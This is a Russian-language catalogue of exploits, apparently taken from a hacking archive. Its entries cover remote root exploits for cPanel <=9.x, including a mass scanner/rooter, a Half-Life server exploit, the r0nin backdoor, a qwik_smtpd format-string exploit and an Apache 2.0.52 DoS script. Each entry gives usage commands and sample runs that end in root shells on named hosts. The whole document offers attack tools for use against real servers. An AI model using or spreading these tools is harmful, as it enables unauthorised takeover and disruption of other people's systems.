Название экспоита: Private Remote Root Exploit
for Cpanel |
Поражаемые цели: <= 9.x |
Разработан: Tal0n |
Применение: ./cpanel-expl <хост> |
Пример:
[zig@flopppp zig]$./cpanel-expl www.arax.md
nCPanel <= 9.x Remote Root Exploit, by Tal0n
Connect
Exploit Sent! Closing socket and sleeping for 5 seconds...
Done! Connecting to www.arax.md for shell...
Now Telnet www.arax.md port 5190
Telnet www.arax.md 5190
[root@arax root]id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
> |
Имя файла в архиве: excpanel.c |
Название экспоита: CPanel Scanner/Rooter |
Поражаемые цели: <= 9.x |
Разработан: luciffer;re-written by Tal0n |
Применение: ./cpanelmassroot <диапозон> |
Пример:
[zig@flopppp zig]$./cpanlemassroot 211
CPanel <= 9.x Scanner/Rooter, by Tal0n 03-13-04
Thanks to luciffer for main scanner source, great work! :)
Found possible vulnerable cpanel server 211.139.99.180
Trying exploit 211.139.99.180...
Exploitation Complete, moving on...
|
Имя файла в архиве: scancpanel.c |
Название экспоита: Halflife- Remote
Root exploit |
Поражаемые цели: 3.1.1.1 |
Разработан: eSDee |
Применение:
./hlexpl [-dDpPsTw] <-t тип> <хост>
-d <device> девайс. (по умолчанию: eth0)
-p <port> порт для удаллёного хоста (по умолчанию: 27015)
-D <delay> задержка. (по умолчинию: 12 seconds)
-T <timeout> Таймаут. (по умолчанию: 4 seconds)
-t <type> типы (0 для одного листа)
-P <pops> номер stackpop'ов
-s <address> адресс шеллкода
-w <address> write address
|
Пример:
[zig@flopppp zig]$ ./hlds-expl -t3 10.0.0.7
hlds - 3.1.1.1 - Remote exploit by eSDee ([email protected])
-----------------------------------------------------------
[+] Local IP address : 10.0.0.7:62428
[+] Target selected : hlds 3.1.1.1 - (hlds_amd)
[+] write address : 0x40143BD8
[+] shellcode address : 0x405CC1D4
[+] stack pops : 21
[+] Challenge id : 4050320626
[+] Shellcode XOR value: 0x8E
[+] Worked!
-----------------------------------------------------------
Linux flopppp 2.4.18-14 #1 Wed Sep 4 12:13:11 EDT 2002 i686 athlon i386
GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) |
Имя файла в архиве: half.c |
Название экспоита: r0nin backdoor |
Поражаемые цели: *nix |
Разработан: r0nin |
Применение: ./r0nin |
Пример:
[back@own back]$ ./r0nin
PsychoPhobia Backdoor is starting...OK, pid = 20570
[zig@flopppp zig]$ telnet www.backdoored.com 1666
([email protected]:/ |
( к сожалению бэкдор доступен только в
бинарнике) |
Название экспоита: qwik-smtp Remote
Root Exploit |
Поражаемые цели: qwik-smtp |
Разработан: Dark Eagle |
Применение: ./qwik |
Пример:
[ziggy@ziGGy qwik]$ ./a.out -h localhost -u [email protected]
-t 0 -i 127.0.0.1
==[ qwik_smtpd Remote Format String Exploit, bY Carlos Barros ]==
Target plataform : qwik_smtpd 0.3 - Fedor Core
2
Target host : localhost
Target port : 25
Target GOT : 0x0804b2e8
Target Retaddr : 0xfeffe6f0
** -> Connecting ... OK
** -> Getting the banner ... 220 SMTP service ready
**
** *** STAGE 1 ***
**
** -> Creating EvilBuffer ... OK
** -> Sending HELO with EvilBuffer ... OK
** -> Sending MAIL FROM with Shellcode ... OK
** -> Sending RCPT TO ... OK
** -> Sending DATA ... OK
** -> Sending "." ... OK
**
** *** STAGE 2 ***
**
** -> Creating EvilBuffer ... OK
** -> Sending HELO with EvilBuffer ... OK
** -> Sending MAIL FROM with Shellcode ... OK
** -> Sending RCPT TO ... OK
** -> Sending DATA ... OK
** -> Sending "." ... OK
** -> Attacking ... OK
**
** Try to send some commands. If doesn't work, hit CTRL+C to exit
**
** Linux ziGGy 2.6.8-1.521 #1 Mon Aug 16 09:01:18 EDT 2004 i686 i686 i386
GNU/Linux
** uid=0(root) gid=0(root)
** exit
** [ziggy@ziGGy qwik]$
|
Имя файла в архиве: qwuik-smtp.c |
Название экспоита: Apache 2.0.52
8000x" " DoS attack |
Поражаемые цели: Apache 2.0.52 |
Разработан: Noam Rathaus |
Применение: ./apache_xpl.pl [хост] [порт] |
Пример:
[ziggy@ziGGy expl]$./apache_xpl.pl la2.arax.md
80
Sending...
................................................................................
................................................................................
................................................................................
................................................................................
................................................................................
................................................................................
................................................................................
................................................................................
................................................................................
................................................................................
Done.
|
Имя файла в архиве: apche.pl |
|